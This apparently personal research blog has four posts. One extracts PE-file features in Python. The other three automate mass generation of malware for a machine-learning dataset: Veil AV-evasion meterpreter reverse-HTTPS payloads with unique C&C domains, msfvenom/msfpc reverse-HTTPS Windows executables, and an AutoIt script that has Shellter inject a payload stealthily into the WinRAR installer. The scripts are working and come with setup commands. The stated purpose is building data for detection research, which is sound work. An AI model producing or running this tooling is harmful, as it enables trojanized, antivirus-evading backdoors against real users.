Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.
The code is based on Adobe's 2012 Malware Classifier and has been modified for my own purposes.
The code uses the pefile Python module to read and work with PE files.
 
My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First import the required python library. 
import os
import pefile
import pandas as pd
import hashlib

Next, define a function that computes the MD5 hash of a file given its filename. *The filename must be a full path if the binary is located in a different directory from the Python script.
def md5sum(filename, blocksize=65536):
    """Return the hexadecimal MD5 digest of the file at *filename*.

    The file is opened in binary mode and fed to the hash in pieces of
    *blocksize* bytes, so the whole file is never held in memory at once.
    """
    digest = hashlib.md5()
    with open(filename, "rb") as stream:
        while True:
            chunk = stream.read(blocksize)
            if not chunk:
                # An empty read marks end of file.
                break
            digest.update(chunk)
    return digest.hexdigest()

Next define a python class to represent the PE binary file.
class PEFile:
    """Static features read from the headers of one PE binary.

    After construction the instance carries one attribute per feature
    (data-directory sizes/RVAs, version fields, section and import counts,
    the file's MD5) plus ``pe``, the parsed ``pefile.PE`` object.
    ``Construct`` returns the features as a plain dictionary.

    Binaries with a truncated data-directory table, fewer than two sections
    or no import table yield 0 for the affected features instead of raising.
    """

    def __init__(self, filename):
        """Parse *filename* and populate the feature attributes.

        Raises whatever ``open`` or ``pefile.PE`` raise for unreadable or
        non-PE input.
        """
        with open(filename, "rb") as file_content:
            # fast_load skips the data directories; imports are parsed below.
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename

        optional_header = self.pe.OPTIONAL_HEADER
        sections = self.pe.sections

        # Data-directory indexes: 0 = export, 2 = resource, 6 = debug, 12 = IAT.
        self.DebugSize = self._directory_field(6, "Size")
        self.DebugRVA = self._directory_field(6, "VirtualAddress")
        self.ImageVersion = optional_header.MajorImageVersion
        self.OSVersion = optional_header.MajorOperatingSystemVersion
        self.ExportRVA = self._directory_field(0, "VirtualAddress")
        self.ExportSize = self._directory_field(0, "Size")
        self.IATRVA = self._directory_field(12, "VirtualAddress")
        self.ResSize = self._directory_field(2, "Size")
        self.LinkerVersion = optional_header.MajorLinkerVersion
        # Virtual size of the second section; 0 when there is no second section.
        self.VirtualSize2 = sections[1].Misc_VirtualSize if len(sections) > 1 else 0
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = optional_header.SizeOfStackReserve
        self.Dll = optional_header.DllCharacteristics

        # Only the import table is used, so only that directory is parsed.
        self.pe.parse_data_directories(
            directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]]
        )
        # pefile does not set DIRECTORY_ENTRY_IMPORT when there are no imports.
        imports = getattr(self.pe, "DIRECTORY_ENTRY_IMPORT", [])
        # Number of import descriptors (one per imported DLL).
        self.ImportFunctionCount = len(imports)
        # Total number of imported symbols across all DLLs.
        self.ImportFunctionMethodCount = sum(len(entry.imports) for entry in imports)

        self.md5hash = md5sum(filename)
        print("Loaded PE File")

    def _directory_field(self, index, field):
        """Return *field* of data directory *index*, or 0 if that entry is absent."""
        directories = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY
        if index < len(directories):
            return getattr(directories[index], field)
        return 0

    def Construct(self):
        """Return the instance attributes as a dict, leaving out the ``pe`` object."""
        sample = {
            feature: value
            for feature, value in self.__dict__.items()
            if feature != "pe"
        }
        print("Construct completed")
        return sample

Function that walks a directory tree looking for PE files. The PE header and section information of each file is extracted, stored in a Python dictionary, and returned.
def pe2vec(directory="C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"):
    """Extract features from every file under *directory*, recursively.

    Returns a dictionary mapping each file's path relative to *directory*
    to the feature dictionary produced by ``PEFile.Construct``. For files
    directly inside *directory* the key is just the file name; files in
    sub-directories keep their sub-path so that equal file names in
    different folders do not overwrite each other.

    Files that cannot be processed are reported on stdout and skipped.
    """
    dataset = {}
    for subdir, _dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            key = os.path.relpath(file_path, directory)
            try:
                dataset[key] = PEFile(file_path).Construct()
            except Exception as e:
                # Best effort: one unreadable or malformed file must not
                # abort the whole scan, but say which file was dropped.
                print("Skipping %s: %s" % (file_path, e))
    return dataset

Function that saves the Python dictionary returned by pe2vec() to a CSV file.
def saveToCSV(dataset, path='C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv'):
    """Write *dataset* to a comma-separated, UTF-8 encoded CSV file at *path*.

    *dataset* maps a sample name to its feature dictionary. The resulting
    file has one row per sample and one column per feature, with the sample
    name in the first (index) column.
    """
    # DataFrame(dataset) puts samples in columns; transpose to one row each.
    infected = pd.DataFrame(dataset).transpose()
    infected.to_csv(path, sep=',', encoding='utf-8')
    


Full Code is shown below:
import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    """Compute the MD5 checksum of a file and return it as a hex string.

    Reads the file in binary mode, *blocksize* bytes at a time, updating
    the running hash after each read until the file is exhausted.
    """
    md5 = hashlib.md5()
    with open(filename, "rb") as handle:
        data = handle.read(blocksize)
        while data:
            md5.update(data)
            data = handle.read(blocksize)
    return md5.hexdigest()

class PEFile:
    """Static features read from the headers of one PE binary.

    After construction the instance carries one attribute per feature
    (data-directory sizes/RVAs, version fields, section and import counts,
    the file's MD5) plus ``pe``, the parsed ``pefile.PE`` object.
    ``Construct`` returns the features as a plain dictionary.

    Binaries with a truncated data-directory table, fewer than two sections
    or no import table yield 0 for the affected features instead of raising.
    """

    def __init__(self, filename):
        """Parse *filename* and populate the feature attributes.

        Raises whatever ``open`` or ``pefile.PE`` raise for unreadable or
        non-PE input.
        """
        with open(filename, "rb") as file_content:
            # fast_load skips the data directories; imports are parsed below.
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename

        optional_header = self.pe.OPTIONAL_HEADER
        sections = self.pe.sections

        # Data-directory indexes: 0 = export, 2 = resource, 6 = debug, 12 = IAT.
        self.DebugSize = self._directory_field(6, "Size")
        self.DebugRVA = self._directory_field(6, "VirtualAddress")
        self.ImageVersion = optional_header.MajorImageVersion
        self.OSVersion = optional_header.MajorOperatingSystemVersion
        self.ExportRVA = self._directory_field(0, "VirtualAddress")
        self.ExportSize = self._directory_field(0, "Size")
        self.IATRVA = self._directory_field(12, "VirtualAddress")
        self.ResSize = self._directory_field(2, "Size")
        self.LinkerVersion = optional_header.MajorLinkerVersion
        # Virtual size of the second section; 0 when there is no second section.
        self.VirtualSize2 = sections[1].Misc_VirtualSize if len(sections) > 1 else 0
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = optional_header.SizeOfStackReserve
        self.Dll = optional_header.DllCharacteristics

        # Only the import table is used, so only that directory is parsed.
        self.pe.parse_data_directories(
            directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]]
        )
        # pefile does not set DIRECTORY_ENTRY_IMPORT when there are no imports.
        imports = getattr(self.pe, "DIRECTORY_ENTRY_IMPORT", [])
        # Number of import descriptors (one per imported DLL).
        self.ImportFunctionCount = len(imports)
        # Total number of imported symbols across all DLLs.
        self.ImportFunctionMethodCount = sum(len(entry.imports) for entry in imports)

        self.md5hash = md5sum(filename)
        print("Loaded PE File")

    def _directory_field(self, index, field):
        """Return *field* of data directory *index*, or 0 if that entry is absent."""
        directories = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY
        if index < len(directories):
            return getattr(directories[index], field)
        return 0

    def Construct(self):
        """Return the instance attributes as a dict, leaving out the ``pe`` object."""
        sample = {
            feature: value
            for feature, value in self.__dict__.items()
            if feature != "pe"
        }
        print("Construct completed")
        return sample
    
def pe2vec(directory="C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"):
    """Extract features from every file under *directory*, recursively.

    Returns a dictionary mapping each file's path relative to *directory*
    to the feature dictionary produced by ``PEFile.Construct``. For files
    directly inside *directory* the key is just the file name; files in
    sub-directories keep their sub-path so that equal file names in
    different folders do not overwrite each other.

    Files that cannot be processed are reported on stdout and skipped.
    """
    dataset = {}
    for subdir, _dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            key = os.path.relpath(file_path, directory)
            try:
                dataset[key] = PEFile(file_path).Construct()
            except Exception as e:
                # Best effort: one unreadable or malformed file must not
                # abort the whole scan, but say which file was dropped.
                print("Skipping %s: %s" % (file_path, e))
    return dataset
    
def saveToCSV(dataset, path='C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv'):
    """Write *dataset* to a comma-separated, UTF-8 encoded CSV file at *path*.

    *dataset* maps a sample name to its feature dictionary. The resulting
    file has one row per sample and one column per feature, with the sample
    name in the first (index) column.
    """
    # DataFrame(dataset) puts samples in columns; transpose to one row each.
    infected = pd.DataFrame(dataset).transpose()
    infected.to_csv(path, sep=',', encoding='utf-8')
    
# Run the extraction only when executed as a script, so that importing this
# module (e.g. to reuse PEFile or md5sum) does not start a directory scan.
if __name__ == "__main__":
    pedata = pe2vec()
    saveToCSV(pedata)





Saturday, August 11, 2018

Automating generation of VEIL payloads

This post serves as a journal of the technique used for automating generation of VEIL payloads. 
https://github.com/Veil-Framework

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus. 

Overview:
1) On a Kali Linux VM
2) Install VEIL framework

apt update
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

3) Open gedit and copy the Python script below. Save it as veil_malware_generation_script.py in the veil directory (/usr/share/veil)

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

# Batch driver: for every row of ./website.csv, invoke ./Veil.py once with
# column 0 as the --ip value and column 1 as the output name (-o), and repeat
# the invocation until the tool's stdout contains `correctmsg`.

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
# NOTE(review): the result of describe() is discarded, so nothing is shown.
df.describe()
print ("Loaded domain name file")
print("")

# Substrings searched for in the tool's stdout to classify a run.
correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"

# Rows whose index is below this value are skipped (use it to resume a run).
startfrom = 0

for index, row in df.iterrows():
 if startfrom > index:
  print ("skip: "+str(row[1]))
  continue

 attempt = 1
 # Try to resolve the name in column 0. The resolved address is only
 # printed; row[0] itself is what is later passed to the tool.
 try:
  addr = socket.gethostbyname(row[0])
  print(addr)
 except socket_error as serr:  
  # NOTE(review): -2 is presumably the resolver's "name not known" code on
  # Linux -- confirm. Any other socket error is silently ignored here.
  if serr.errno == -2:
   print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
   row[0] = "127.0.0.1"

 # `command` is used for log output only; the actual argument list is
 # spelled out in the Popen call below.
 command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + row[0] + " --port 443" 
 binaryname = str(row[1])+".exe"
 print (command)
 
 # i holds the position of errmsg in the output, x the position of
 # correctmsg. The loop condition depends on x only.
 i = 9999
 x = -1
 # NOTE(review): there is no retry limit; a row that never produces
 # correctmsg keeps this loop running forever.
 while x == -1:
  proc = subprocess.Popen(['./Veil.py','-t','Evasion','-p','cs/meterpreter/rev_https.py','--ip',str(row[0]),'--port','443','-o',str(row[1])], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  # Only stdout is inspected; stderr is captured and dropped.
  # NOTE(review): find() with a str argument assumes stdout is a str
  # (Python 2); under Python 3 communicate() returns bytes -- confirm.
  tmp = proc.communicate()[0]
  x = tmp.find(correctmsg)
  # i == -1 means errmsg was not found in the output
  i = tmp.find(errmsg)
  #print ("i value:" + str(i))

  # NOTE(review): both branches below can fire for the same run, which
  # increments `attempt` twice.
  if i != -1 :
   print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
   attempt = attempt + 1 
  if x == -1 :
   print ("error: " + tmp)
   attempt = attempt + 1 

 print ("Command: " + command + " is successful.")
 print ("Saving as :" + binaryname)
 # The rename step is disabled here; the output name is given via -o above.
 #subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
 print ("Saved")
 print ("")
 
 

4) Create a csv file using excel with the following format and save it as website.csv: 


5) Execute the Python script 

cd /usr/share/veil
python veil_malware_generation_script.py

6) The generated binaries are saved in /var/lib/veil/output/compiled

7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.

Wednesday, July 25, 2018

Automating generation of Metasploit payloads

This post serves as a journal of the technique used for automating generation of Metasploit payloads. 

Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: Previously I used MSFvenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper script on top of MSFvenom. MSFPC alone is insufficient to meet my objective, so I had to write a wrapper script on top of MSFPC.

*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant. 

Overview:
1) On a Kali Linux VM
2) Update Metasploit
apt update
apt install metasploit-framework

3) Install MSFPC
apt install -y msfpc

4) Open gedit and copy the below python script
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

# Batch driver: for every row of ./website.csv, invoke msfpc with
# "windows <column 0> https", repeat until its stdout contains `correctmsg`,
# then rename the produced executable to "<column 1>.exe".

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
# NOTE(review): the result of describe() is discarded, so nothing is shown.
df.describe()
print ("Loaded domain name file")
print("")

# Substrings searched for in the tool's stdout to classify a run.
correctmsg = "Done"
errmsg = "bignum too big to convert"

# Rows whose index is below this value are skipped (use it to resume a run).
startfrom = 2

for index, row in df.iterrows():
	if startfrom > index:
		print ("skip: "+str(row[1]))
		continue

	attempt = 1
	# Try to resolve the name in column 0. The resolved address is only
	# printed; row[0] itself is what is later passed to the tool.
	try:
		addr = socket.gethostbyname(row[0])
		print(addr)
	except socket_error as serr:		
		# NOTE(review): -2 is presumably the resolver's "name not known" code
		# on Linux -- confirm. Any other socket error is silently ignored.
		if serr.errno == -2:
			print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
			row[0] = "127.0.0.1"

	command = "windows " + row[0] + " https" 
	binaryname = str(row[1])+".exe"
	print (command)
	
	# i holds the position of errmsg in the output, x the position of
	# correctmsg. The loop condition depends on x only.
	i = 9999
	x = -1
	# NOTE(review): there is no retry limit; a row that never produces
	# correctmsg keeps this loop running forever.
	while x == -1:
		# NOTE(review): `command` is passed as ONE argument containing
		# spaces, not as three separate arguments -- confirm this is what
		# msfpc expects.
		proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
		# Only stdout is inspected; stderr is captured and dropped.
		# NOTE(review): find() with a str argument assumes stdout is a str
		# (Python 2); under Python 3 communicate() returns bytes -- confirm.
		tmp = proc.communicate()[0]
		x = tmp.find(correctmsg)
		# i == -1 means errmsg was not found in the output
		i = tmp.find(errmsg)
		#print ("i value:" + str(i))

		# NOTE(review): both branches below can fire for the same run, which
		# increments `attempt` twice.
		if i != -1 :
			print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
			attempt = attempt + 1 
		if x == -1 :
			print ("error: " + tmp)
			attempt = attempt + 1 

	print ("Command: msfpc " + command + " is successful.")
	print ("Saving as :" + binaryname)
	# Rename the fixed-name output file to the per-row name.
	# NOTE(review): binaryname comes from the CSV and is interpolated into a
	# shell string; the return code of mv is not checked.
	subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
	print ("Saved")
	print ("")
	
	

5) Create a csv file using excel with the following format and save it as website.csv: 













6) Execute the Python script (*internet is needed as msfvenom will validate the LHOST domain name)

7) About 40mins for 100 binaries, 900 to go =)

Metasploit bignum too big to convert into `long' error

Background:
If you are having the following error, it might be that your Metasploit framework is outdated.
I was having this issue when i used Metasploit framework from a Kali 2017 vm image without updating it.


Solution:
1. Update the framework, the below command works on my Kali Linux.

apt update
apt install metasploit-framework

Wednesday, July 4, 2018

Automating generation of SHELLTER payloads

This post serves as a journal of the technique used for automating generation of SHELLTER payloads. 

Objective: Generation of 1000 SHELLTER payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: SHELLTER is a closed-source shellcode injection framework that performs dynamic PE infection based upon the execution flow of the target application. This approach does not modify the original PE header, thus allowing the binary to appear normal under static analysis.

SHELLTER is a windows PE binary and can be found https://www.shellterproject.com/download/

It can be executed on Linux using WINE or directly in Windows. 

Challenge: I initially ran SHELLTER from Linux but had difficulty automating a WINE terminal. After researching Python's subprocess module, I found it too much of a hassle to redirect input and output between a WINE terminal and a Linux terminal.


Thus i ended up automating SHELLTER from native Windows instead. Autoit is a free software designed for creation of automated scripts. 


Overview of Technique:
1) Create a Win7 VM on VMWARE
2) Download SHELLTER 
3) Download and install Autoit 
4) Open Autoit SciTE script editor
5) Type in the following script


#include <MsgBoxConstants.au3>;
#RequireAdmin

#include <FileConstants.au3>;
#include <MsgBoxConstants.au3>;
#include <WinAPIFiles.au3>;
#include <File.au3>;


;If IsAdmin() Then MsgBox($MB_SYSTEMMODAL, "", "The script is running with admin rights.")

; Generate: starts .\shellter.exe and answers its prompts by sending
; keystrokes, with fixed Sleep() pauses (milliseconds) between answers.
;   $vVar1 - text typed at the "domain name" step (default "google.com").
; NOTE(review): the sequence relies on fixed delays only; nothing checks that
; the expected prompt is actually on screen before the next keys are sent.
Func Generate($vVar1 = "google.com")
 Run('.\shellter.exe')
 Sleep(1000)
 ; Wait (at most 1 second) for a window titled "Shell7er" to become active.
 ; The return value is not checked.
 WinWaitActive("Shell7er", "", 1)

 ;automate
 Send("A{Enter}")
 Sleep(1000)

 ;Do not check update
 Send("N{Enter}")
 Sleep(1000)

 ;original binary path
 Send(".\wrar560.exe{Enter}")
 ; Long pause (35 s) before the next answer is typed.
 Sleep(35000)

 ;Stealth mode
 Send("Y{Enter}")
 Sleep(1000)

 ;payload selection
 Send("l{Enter}")
 Sleep(2000)
 Send("3{Enter}")
 Sleep(1000)

 ;domain name
 Send($vVar1)
 Send("{Enter}")
 Sleep(1000)

 ;port number
 Send("443{Enter}")
 Sleep(10000)

 ; Final Enter after the 10 s pause.
 Send("{Enter}")
EndFunc


; print: debugging helper that shows $test3 in a system-modal message box
; with an empty title. Its only call site below is commented out.
Func print($test3)
 MsgBox($MB_SYSTEMMODAL, "", $test3)
EndFunc

; Main loop: for each line of .\website.csv from $StartFrom onwards, split
; the line on commas, call Generate() with the first field, then move
; .\wrar560.exe to .\malware\<second field> and put the copy from
; .\Shellter_Backups back in its place for the next iteration.
$file = ".\website.csv"
; NOTE(review): the handle returned by FileOpen is discarded; the calls below
; pass the file NAME to FileReadLine/_FileCountLines/FileClose instead.
FileOpen($file, 0)

;2 is first entry, 1 is the header
$StartFrom = 2

For $i = $StartFrom to _FileCountLines($file)
    ; StringSplit returns the element count in [0]; fields start at [1].
    $line = StringSplit(FileReadLine($file, $i),",")
 $domainName = $line[1]
 Generate($domainName)
 ;print($line[2])
 Sleep(3000)
 $sDestination = ".\malware\" & $line[2]
 ;MsgBox($MB_SYSTEMMODAL, "", $sDestination)
 ; Store the processed binary under its per-row name, overwriting any
 ; existing file of that name.
 FileMove(".\wrar560.exe", $sDestination, $FC_OVERWRITE)
 ; Bring back the copy kept in .\Shellter_Backups for the next iteration.
 FileMove(".\Shellter_Backups\wrar560.exe", ".\wrar560.exe", $FC_OVERWRITE)
Next

; NOTE(review): FileClose is given the filename string, not a file handle --
; confirm this actually closes the handle opened above.
FileClose($file)

6) Save the Autoit script in the same directory where Shellter.exe resides in.
7) Create a csv file using excel with the following format and save it as website.csv: 

8) I have chosen to pack winrar (wrar560.exe) with the payload, you may find it here https://www.rarlab.com/rar/wrar560.exe
9) Save wrar560.exe to the same directory as Shellter.exe
10) Execute the Autoit script 


Results: 
Took about 2 days to create over 900 malware samples. 100 more to go =)

Feel free to modify the script accordingly.